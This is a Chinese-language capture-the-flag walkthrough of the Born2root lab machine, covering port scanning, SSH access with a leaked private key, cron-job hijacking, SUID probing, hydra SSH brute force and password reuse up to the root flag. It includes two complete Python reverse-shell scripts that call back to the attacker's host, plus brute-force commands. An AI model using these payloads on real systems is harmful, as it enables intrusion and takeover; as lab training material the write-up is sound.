Born2root 靶机

信息收集

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.135
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-17 11:49 EDT
Nmap scan report for 192.168.56.135
Host is up (0.00091s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
46650/tcp open  unknown
MAC Address: 08:00:27:81:98:42 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.82 seconds

开放了 22,80,111,56650 端口，接下来进行版本探测

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ sudo nmap -sT -sV -sC -O -p22,80,111,46650 192.168.56.135     
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-17 11:50 EDT
Nmap scan report for 192.168.56.135
Host is up (0.00047s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
|   2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
|   256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|_  256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title:  Secretsec Company 
| http-robots.txt: 2 disallowed entries 
|_/wordpress-blog /files
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          46371/udp6  status
|   100024  1          46650/tcp   status
|   100024  1          48871/udp   status
|_  100024  1          49219/tcp6  status
46650/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:81:98:42 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.60 seconds

有价值的信息不多，提取一下：Debian 操作系统，OpenSSH 6.7，robots.txt（含两个目录信息），Apache httpd 2.4.10

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ sudo nmap --script=vuln -p22,80,111,46650 192.168.56.135 
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-17 12:15 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.56.135
Host is up (0.00035s latency).

PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
| http-enum: 
|   /robots.txt: Robots file
|   /files/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|   /icons/: Potentially interesting folder w/ directory listing
|_  /manual/: Potentially interesting folder
111/tcp   open  rpcbind
46650/tcp open  unknown
MAC Address: 08:00:27:81:98:42 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 61.72 seconds

漏洞脚本扫描的结果中多了两个目录 \icons \manual

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ sudo nmap --top-ports 20 -sU 192.168.56.135              
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-17 12:27 EDT
Nmap scan report for secretsec.com (192.168.56.135)
Host is up (0.0037s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
123/udp   closed        ntp
135/udp   open|filtered msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   open|filtered snmptrap
445/udp   closed        microsoft-ds
500/udp   open|filtered isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
49152/udp closed        unknown
MAC Address: 08:00:27:81:98:42 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.01 seconds

Web 渗透

UDP 扫描结果没收获，接下来进入 Web 界面进行查看，同时进行目录爆破。首页是一些公司相关信息和人名信息，使用 cewl 工具收集信息。

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ sudo gobuster dir -u http://192.168.56.135 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,rar,txt,zip,sql
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.135
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              zip,sql,php,rar,txt
[+] Timeout:                 10s
===============================================================
2023/08/17 16:18:46 Starting gobuster in directory enumeration mode
===============================================================
/icons                (Status: 301) [Size: 316] [--> http://192.168.56.135/icons/]
/files                (Status: 301) [Size: 316] [--> http://192.168.56.135/files/]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.135/manual/]
/robots.txt           (Status: 200) [Size: 57]
/server-status        (Status: 403) [Size: 302]
Progress: 1322350 / 1323366 (99.92%)
===============================================================
2023/08/17 16:23:13 Finished
===============================================================

没有新的暴露的信息，继续查看 Web 界面，先看看 robots.txt 有两个路径分别查看

User-agent: *
Disallow: /wordpress-blog
Disallow: /files

似乎被嘲讽了，不过还是得把图片保存下来，因为图看起来缺了一部分，需要查查有没有问题

使用 strings, file, exiftool, binwalk 均未发现异常（由于信息太多，这里仅列出以下一部分）

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ file index.jpeg 
index.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 100", baseline, precision 8, 850x315, components 3

修改图片高度

私钥泄露

还尝试了搜一搜原图，依然没收获，可能这张图本来就是这样吧。还尝试了对 wordpress-blog 进行了目录爆破，依然没收获。继续看看别的目录。

有点奇怪，下载下来看看

看起来似乎是私钥，将其写入本地文件中，修改权限为 600，尝试使用 ssh 登录，用户名的话，首页信息中看到了联系人的邮箱名字，先使用这个进行尝试吧。

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ sudo ssh -i privatekey martin@192.168.56.135                      
[sudo] password for kali: 
The authenticity of host '192.168.56.135 (192.168.56.135)' can\'t be established.
ED25519 key fingerprint is SHA256:y7AzR/QI4CJW3DLNEfBYopBbKkUP12PZv3vt+1ZQP6E.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.135' (ED25519) to the list of known hosts.
sign_and_send_pubkey: no mutual signature supported
martin@192.168.56.135\'s password: 

Permission denied, please try again.
martin@192.168.56.135\'s password

依然要输密码，不过情况看起来可能是算法不匹配的问题 sign_and_send_pubkey: no mutual signature supported，尝试直接谷歌搜索这个

翻找了一下找到了答案，不过这里更好地处理方法是增加 ssh 参数，然后进行分析判断

debug1: Next authentication method: publickey
debug1: Trying private key: privatekey
sign_and_send_pubkey: no mutual signature supported
debug2: we did not send a packet, disable method
debug1: Next authentication method: password
martin@192.168.56.135's password:

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ ssh -o PubkeyAcceptedKeyTypes=ssh-rsa -i privatekey martin@192.168.56.135                   

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun  9 20:31:29 2017 from 192.168.0.42

READY TO ACCESS THE SECRET LAB ? 

secret password : ^CTraceback (most recent call last):
  File "/var/tmp/login.py", line 8, in <module>
    password = raw_input("secret password : ")
KeyboardInterrupt
martin@debian:~$ whoami
martin
martin@debian:~$ id
uid=1001(martin) gid=1001(martin) groupes=1001(martin)
martin@debian:~$ w
 00:28:02 up  6:43,  1 user,  load average: 0,00, 0,01, 0,08
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
martin   pts/0    192.168.56.106   00:26    1.00s  0.05s  0.00s w
martin@debian:~$ id
uid=1001(martin) gid=1001(martin) groupes=1001(martin)
martin@debian:~$ sudo -l
-bash: sudo : commande introuvable
martin@debian:~$ uname -a
Linux debian 3.16.0-4-586 #1 Debian 3.16.39-1+deb8u2 (2017-03-07) i686 GNU/Linux
martin@debian:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 08:00:27:81:98:42 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.135/24 brd 192.168.56.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe81:9842/64 scope link 
       valid_lft forever preferred_lft forever
martin@debian:~$ ls -alih
total 28K
128334 drwxr-xr-x 3 martin martin 4,0K juin   8  2017 .
128262 drwxr-xr-x 5 root   root   4,0K juin   9  2017 ..
128341 -rw------- 1 martin martin  613 août  18 00:28 .bash_history
128335 -rw-r--r-- 1 martin martin  220 juin   7  2017 .bash_logout
128337 -rwx--x--x 1 martin martin 3,5K juin   7  2017 .bashrc
128336 -rw-r--r-- 1 martin martin  675 juin   7  2017 .profile
128338 drwxr-xr-x 2 root   root   4,0K juin   7  2017 .ssh

显示要输入密码，我下意识 ctrl+c 结果直接报错了，看起来是 python 写的脚本在登录的时候自动触发，不过看起来用处不是很大

martin@debian:~$ cat .bash_history 
nano /var/tmp/login.py
nano .bashrc
ls
ls -ah
sudo su
exit
nano /var/tmp/login.py
clear
nano /var/tmp/login.py
su root
ls
su root
clear
su root
clear
cd /var/www/html/icons/
ls
mv VdXAsOKisAOIO.txt.png key.txt.png
su root
su roo
su root
exit
ls
su root
exit
logout

/var/tmp/login.py 查看查看这个文件的信息

martin@debian:~$ ls -laih /var/tmp/login.py
55 -r-x------ 1 martin martin 263 juin   8  2017 /var/tmp/login.py
martin@debian:~$ cat /var/tmp/login.py
#!/usr/bin/python

import os

print("")
print("READY TO ACCESS THE SECRET LAB ? ")
print("")
password = raw_input("secret password : ")

if (password) == "secretsec" or "secretlab" :
        print("WELCOME ! ")
else:
        print("GET OUT ! ")
        os.system("pkill -u 'martin'")

脚本看起来有点废，尤其是中间的判断语句 if (password) == "secretsec" or "secretlab" 这样的话不就肯定是 true 了，用户无论输入什么都能进入

而且权限也不让人很在意，脚本中的两个口令先收集起来，或许可以用来碰撞，尝试 su 命令使用上面两个口令作为密码。但是均失败了

martin@debian:/home$ ls -laih
total 20K
128262 drwxr-xr-x  5 root   root   4,0K juin   9  2017 .
     2 drwxr-xr-x 21 root   root   4,0K avril 26  2017 ..
141088 drwxr-xr-x  3 hadi   hadi   4,0K juin   5  2017 hadi
141985 drwx------  2 jimmy  jimmy  4,0K juin   9  2017 jimmy
128334 drwxr-xr-x  3 martin martin 4,0K juin   8  2017 martin

home 目录中存在三个用户，只有 hadi 可以进去查看

martin@debian:/home/hadi$ ls -alih
total 60K
141088 drwxr-xr-x 3 hadi hadi 4,0K juin   5  2017 .
128262 drwxr-xr-x 5 root root 4,0K juin   9  2017 ..
141089 -rw-r--r-- 1 hadi hadi  220 avril 26  2017 .bash_logout
141091 -rw-r--r-- 1 hadi hadi 3,5K avril 26  2017 .bashrc
128327 -rwxr-xr-x 1 root root 5,3K mai   10  2017 buff
141549 -rw-r--r-- 1 root root 1,1K mai   10  2017 buff.c
128332 -rw-r--r-- 1 root root  148 juin   5  2017 example.c
128329 -rw------- 1 root root 2,1K juin   5  2017 .gdb_history
128340 -rwxr-xr-x 1 root root 5,9K juin   5  2017 overflow
128328 -rw-r--r-- 1 root root   19 mai   10  2017 peda-session-buff.txt
128333 -rw-r--r-- 1 root root    5 juin   5  2017 peda-session-overflow.txt
141090 -rw-r--r-- 1 hadi hadi  675 avril 26  2017 .profile
141097 drwxr-xr-x 2 hadi hadi 4,0K mai    1  2017 .ssh

缓冲区溢出的漏洞？不过这权限也不是 SUID 啊，看不懂了，不过顺便补一补 Linux 上调试缓冲区溢出的知识。

Privilege Escalation in Linux via a Local Buffer Overflow | by Ravishanka Silva | Medium

当输入为 260 个 A 时的内存区

框出来的是，经过测试发现指针的指向

Starting program: /home/hadi/overflow $(python2 -c 'print "A"* 236 +"B"*24')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

仅作简单记录，实际上这个程序漏洞无法用来提权

定时任务提权

接下来我看了敏感文件的权限和网站目录下的文件夹，以及定时任务和 SUID

martin@debian:/home/hadi$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5   * * * *   jimmy   python /tmp/sekurity.py

jimmy 用户的定时任务每五分钟运行一次，不过 tmp 目录下是每次开关机都清空的，所以这里我们可以自己创建一个反弹 shell 的同名 python 文件

# Set the host and the port.                                                                                        
HOST = "192.168.56.106"                                                                                             
PORT = 443                                                                                                          
                                                                                                                    
def connect((host, port)):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        return s

def wait_for_command(s):
        data = s.recv(1024)
        if data == "quit\n":
                s.close()
                sys.exit(0)
        # the socket died
        elif len(data)==0:
                return True
        else:
                # do shell command
                proc = subprocess.Popen(data, shell=True,
                        stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                        stdin=subprocess.PIPE)
                stdout_value = proc.stdout.read() + proc.stderr.read()
                s.send(stdout_value)
                return False

def main():
        while True:
                socket_died=False
                try:
                        s=connect((HOST,PORT))
                        while not socket_died:
                                socket_died=wait_for_command(s)
                        s.close()
                except socket.error:
                        pass
                time.sleep(5)

if __name__ == "__main__":
        import sys,os,subprocess,socket,time
        sys.exit(main())

martin@debian:/tmp$ vi x.py 
martin@debian:/tmp$ chmod +x x.py
# 直接执行测试了一下能不能反弹shell，确认没问题了再修改为同名文件
martin@debian:/tmp$ mv x.py sekurity.py

不过反弹的 shell 因为是 sh 环境，想使用 python 完善 shell 的时候会卡死

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.135] 36957
whoami
jimmy
id
uid=1002(jimmy) gid=1002(jimmy) groupes=1002(jimmy)
ls
networker
pwd
/home/jimmy
ls -liah
total 32K
141985 drwx------ 2 jimmy jimmy 4,0K juin   9  2017 .
128262 drwxr-xr-x 5 root  root  4,0K juin   9  2017 ..
141984 -rw-r--r-- 1 root  root    16 juin   9  2017 .bash_history
141986 -rw-r--r-- 1 jimmy jimmy  220 juin   8  2017 .bash_logout
141988 -rw-r--r-- 1 jimmy jimmy 3,5K juin   8  2017 .bashrc
141996 -rwsrwxrwx 1 root  root  7,4K juin   9  2017 networker
141987 -rw-r--r-- 1 jimmy jimmy  675 juin   8  2017 .profile
cat .bash_history
wget localhost

networker 是有 SUID 的，strings 查看后发现只有 echo 不是绝对路径，但是这个有问题的 shell 无法修改 PATH，尝试换一个反弹 shell 的 python 文件

from os import dup2
from subprocess import call
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.106",443)) 
dup2(s.fileno(),0) 
dup2(s.fileno(),1) 
dup2(s.fileno(),2) 
call(["/bin/bash","-i"])

jimmy@debian:~$ echo $SHELL
echo $SHELL
/bin/sh
jimmy@debian:~$ export PATH=.:$PATH
export PATH=.:$PATH
jimmy@debian:~$ export
export
declare -x HOME="/home/jimmy"
declare -x LANG="fr_FR.UTF-8"
declare -x LOGNAME="jimmy"
declare -x LS_COLORS=""
declare -x OLDPWD
declare -x PATH=".:/home/jimmy:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin"
declare -x PWD="/home/jimmy"
declare -x SHELL="/bin/sh"
declare -x SHLVL="1"

成功写入了 PATH 之中，尝试将偷天换日

jimmy@debian:~$ echo "/bin/bash" >echo    
echo "/bin/bash" >echo
jimmy@debian:~$ chmod +x echo
chmod +x echo

不过搞完发现并没有成功，看起来 echo 命令似乎并不受环境变量的影响。

好吧，确实忘了内建命令这件事，接下来又尝试了 SUID、信息收集

jimmy@debian:~$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
 20871   96 -rwsr-xr-x   1 root     root        96760 août 13  2014 /sbin/mount.nfs
  3589   28 -rwsr-xr-x   1 root     root        26344 mars 30  2015 /bin/umount
  3588   36 -rwsr-xr-x   1 root     root        34684 mars 30  2015 /bin/mount
 13038   40 -rwsr-xr-x   1 root     root        38868 févr. 24  2017 /bin/su
141996    8 -rwsrwxrwx   1 root     root         7496 juin  9  2017 /home/jimmy/networker
 20118 1060 -rwsr-xr-x   1 root     root      1085300 janv.  7  2017 /usr/sbin/exim4
 20945   96 -rwsr-sr-x   1 root     mail        96192 févr. 11  2015 /usr/bin/procmail
 11741   44 -rwsr-xr-x   1 root     root        43576 févr. 24  2017 /usr/bin/chsh
 11740   52 -rwsr-xr-x   1 root     root        52344 févr. 24  2017 /usr/bin/chfn
 11743   80 -rwsr-xr-x   1 root     root        78072 févr. 24  2017 /usr/bin/gpasswd
 11744   52 -rwsr-xr-x   1 root     root        53112 févr. 24  2017 /usr/bin/passwd
 19869   52 -rwsr-sr-x   1 daemon   daemon      50644 sept. 30  2014 /usr/bin/at
 13045   40 -rwsr-xr-x   1 root     root        38740 févr. 24  2017 /usr/bin/newgrp
 20914  552 -rwsr-xr-x   1 root     root       562536 juil. 22  2016 /usr/lib/openssh/ssh-keysign
 20200  356 -rwsr-xr--   1 root     messagebus   362672 nov. 22  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  2048   12 -rwsr-xr-x   1 root     root         9468 mars 28  2017 /usr/lib/eject/dmcrypt-get-device

不过都失败了。有点郁闷，使用 linpeas 来辅助收集信息吧，但却发现 wget, curl,gcc 等命令都被限制了

jimmy@debian:~$ wget
wget
 HAHA ... Nope

不像是 rbash ，可能是作者对某些系统调用进行了 hook

只好使用 scp 上传文件

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ scp -o PubkeyAcceptedKeyTypes=ssh-rsa -i privatekey /home/kali/tools/internal\ information/linpeas.sh martin@192.168.56.135:/tmp
linpeas.sh

但是 linpeas 中看了一圈也没找到什么思路，加上 gcc 又无法使用，黔驴技穷了。

ssh 密码爆破

看了看 WP，没想到是如此的简单粗暴（因为有切换用户的操作，我一直觉得新获得的用户在某些方面有特殊权限或者能读取特殊文件，但没想到直接爆破了）

┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ cat /usr/share/wordlists/rockyou.txt | grep hadi >hadipasswd
                                                                                                                    
┌──(kali㉿kali)-[~/Downloads/born2root]
└─$ sudo hydra -l hadi -P hadipasswd 192.168.56.135 ssh 
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-19 12:30:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1581 login tries (l:1/p:1581), ~99 tries per task
[DATA] attacking ssh://192.168.56.135:22/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 1416 to do in 00:09h, 15 active
[22][ssh] host: 192.168.56.135   login: hadi   password: hadi123
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-19 12:32:27

不过也学了一手，爆破使用的密码是从 rockyou.txt 中取用的和用户名有相同部分的密码，此外还可以使用 cupp -i 命令来根据用户信息生成字典。

密码重用

最后尝试使用这个密码来 su 切换到 root 用户，成功

hadi@debian:/home$ su
Mot de passe : 
root@debian:/home# cd /root
root@debian:~# ls
flag.txt
root@debian:~# cat flag.txt 
                                                                      
,-----.                         ,---. ,------.                 ,--.   
|  |) /_  ,---. ,--.--.,--,--, '.-.  \|  .--. ' ,---.  ,---. ,-'  '-. 
|  .-.  \| .-. ||  .--'|      \ .-' .'|  '--'.'| .-. || .-. |'-.  .-' 
|  '--' /' '-' '|  |   |  ||  |/   '-.|  |\  \ ' '-' '' '-' '  |  |   
`------'  `---' `--'   `--''--''-----'`--' '--' `---'  `---'   `--'   


Congratulations ! you  pwned completly Born2root's CTF .

I hope you enjoyed it and you have made Tea's overdose or coffee's overdose :p 

I have blocked some easy ways to complete the CTF ( Kernel Exploit ... ) for give you more fun and more knownledge ...

Pwning the box with a linux binary misconfiguration is more fun than with a Kernel Exploit !

Enumeration is The Key .



Give me feedback :[FB] Hadi Mene